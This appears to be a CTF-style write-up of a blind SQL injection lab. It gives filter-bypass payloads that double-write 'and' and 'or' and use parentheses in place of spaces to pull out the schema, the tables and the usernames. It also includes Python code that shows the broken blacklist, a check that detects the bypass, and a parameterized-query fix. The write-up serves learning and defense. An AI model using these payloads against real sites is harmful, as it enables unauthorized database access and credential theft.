If there are any mistakes, I'd appreciate the masters pointing them out.
1. Manual injection
Go straight to the source code.
There is no output echo, so I used boolean-based blind injection. The filter strips and, spaces, and comment sequences. Spaces can be bypassed with () or %0a. and can be bypassed with && or by double-writing it (but && does not work in this challenge). Instead of a trailing comment, close the query with ('1'='1.
Confirm the injection point:
?id=1') aandnd ('1'='1
Extract the database name (one character at a time via substr):
?id=1')aandnd(substr((database()),1,1)='s')aandnd('1'='1
Extract the table names. group_concat is used here to get around the limit restriction, and note that the "or" inside information is also filtered, so it has to be double-written as well:
?id=1')aandnd(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,8)='emails,r')aandnd('1'='1
Extract the column names:
?id=1')aandnd(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())aandnd(table_name='users')),1,4)='id,u')aandnd('1'='1
Extract the usernames and passwords:
?id=1')aandnd(substr((select(group_concat(username))from(users)),1,1)='d')aandnd('1'='1
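The reason double-writing works is that a single-pass blacklist never rescans what it leaves behind. The following is an added example (not the lab's code): it reconstructs a filter of that shape, a detection check that flags a keyword reappearing after filtering, the filter-then-concatenate query pattern beside its parameterized replacement, and a constructed users table; the blacklist contents, query shape, and table data are assumptions.

```python
import re
import sqlite3

# Reconstructed blacklist in the style of the lab's filter (an assumption,
# not the lab's real source): each forbidden token is stripped in one pass.
BLACKLIST = ("and", "or", " ", "--", "#", "/*")

def naive_filter(value: str) -> str:
    """Strip each blacklisted token; str.replace never rescans its own output."""
    for token in BLACKLIST:
        value = value.replace(token, "")
    return value  # "aandnd" comes back as "and"

def keyword_survives(value: str) -> bool:
    """Detection check: does a stripped keyword reappear after one filtering pass?"""
    return re.search(r"\b(and|or)\b", naive_filter(value), re.IGNORECASE) is not None

def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "dumb"), (2, "angelina")])
    return conn

def vulnerable_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """Filter-then-concatenate: the filtered text is still parsed as SQL (query shape assumed)."""
    sql = f"SELECT username FROM users WHERE id=('{naive_filter(user_input)}')"
    return [row[0] for row in conn.execute(sql)]

def safe_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    rows = conn.execute("SELECT username FROM users WHERE id=(?)", (user_input,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    probe = "1') aandnd ('1'='1"
    print(keyword_survives(probe))          # True: the blacklist let "and" through
    print(vulnerable_lookup(db, probe))     # ['dumb']: the condition was evaluated
    print(safe_lookup(db, probe))           # []: the whole string is just a value
```

The boolean differential the page relies on shows up as the vulnerable lookup returning a row for a true tail and nothing for a false one, while the parameterized lookup returns nothing for either.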
One more thing: sqlmap is a beast!